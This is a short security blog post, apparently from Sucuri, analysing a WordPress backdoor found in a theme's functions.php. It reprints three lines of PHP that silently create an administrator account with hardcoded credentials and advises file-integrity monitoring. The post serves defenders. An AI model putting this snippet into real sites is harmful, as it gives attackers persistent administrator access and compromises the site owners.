User adder backdoor

As we’ve seen many times before, there are a variety of backdoors that can be planted on a website. Post-compromise, it’s almost mandatory to review the list of users with admin capabilities within the website.

But, what if you check the list, remove a user, and it suddenly reappears again? Could it be a new compromise? Could there still be a backdoor present?

Here’s one of the possible culprits which was found within a theme’s functions.php file:

$createuser = wp_create_user('admin123', 'admin123', 'admin123@gmail.com');
$user_created = new WP_User($createuser);
$user_created -> set_role('administrator');

It’s a very simple piece of code that allows the attacker to maintain access to your website.

This shows how important it is to keep track of the integrity of your files, especially plugins and themes.

Cesar Anjos

Cesar Anjos is Sucuri's Malware Researcher who joined the company in 2014. Cesar's main responsibilities include keeping up with the latest malware and writing about it. His professional experience covers over five years in the area. When Cesar isn't researching, he's finding a way to exercise his mind with anything. Connect with him on our Twitter.

Related Tags

Magento Login Stealer in Fake bg_white.png Image

Luke Leal
February 24, 2020

Our Remediation team analyst Ben Martin recently found a malicious injection in a compromised Magento 1.9.x installation that was stealing Magento user login credentials. The…

Read the Post

Malware Steals Account Credentials

Matt Morrow
November 8, 2024

It’s common for malware to target e-commerce sites, and these attackers are usually seeking to steal credit card details. In most cases, they will insert…

Read the Post

Sucuri Labs

Persistent WordPress User Injection

Krasimir Konov
August 28, 2020

Our team recently stumbled across an interesting example of malicious code used to add an arbitrary user inside WordPress. The following code was detected at…

Read the Post

Throwback Threat Thursday: JCE Vulnerability

Luke Leal
October 24, 2019

Throwback Threat Thursday is a series of posts where we recall older vulnerabilities that have since been patched by their developers. In the past, these…

Read the Post

Magento 2 PHP Skimmer Saves To Image File

Magento Skimmers: From Atob to Alibaba

Denis Sinegubko
August 7, 2019

Last year we saw a fairly massive Magento malware campaign that injected credit card stealing code similar to this: It uses the JavaScript atob function…

Read the Post

Chinese Gambling Spam Leverages World Cup Keywords

Chinese Gambling Spam Targets World Cup Keywords

Denis Sinegubko
December 2, 2022

Since 2018, our team has been tracking an interesting type of website infection where the <title> tag of a hacked website is changed to Chinese…

Read the Post

Personal Online Security – Account Management

Victor Santoyo
January 24, 2020

Continuing a series on how to better strengthen your personal online privacy, we are looking to take personal inventory of how we connect online. These…

Read the Post

Analysis of a Malicious WordPress Plugin: The Covert Redirector

Puja Srivastava
June 18, 2025

A few weeks ago, we received a support request from a website owner who was experiencing unexpected redirects. Visitors landed on the website normally, but…

Read the Post

WordPress Database Upgrade Phishing Campaign

Denis Sinegubko
September 4, 2018

We have recently been notified of phishing emails that target WordPress users. The content informs site owners that their database requires an update and looks…

Read the Post